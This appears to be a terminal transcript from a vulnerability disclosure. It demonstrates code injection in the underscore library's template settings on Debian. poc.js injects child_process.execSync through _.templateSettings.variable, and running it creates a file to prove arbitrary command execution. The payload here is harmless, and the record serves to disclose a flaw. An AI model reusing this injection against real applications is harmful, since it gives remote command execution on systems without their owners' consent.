dummy@sid:~$ dpkg -l node-underscore Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-===============-============-============-=========================================================== ii node-underscore 1.9.1~dfsg-1 all JavaScript's functional programming helper library - NodeJS dummy@sid:~$ ls -l HELLO ls: cannot access 'HELLO': No such file or directory dummy@sid:~$ cat poc.js const _ = require('underscore'); _.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')"; const t = _.template("")(); dummy@sid:~$ nodejs poc.js dummy@sid:~$ ls -l HELLO -rw-r--r-- 1 dummy dummy 0 Mar 30 21:59 HELLO dummy@sid:~$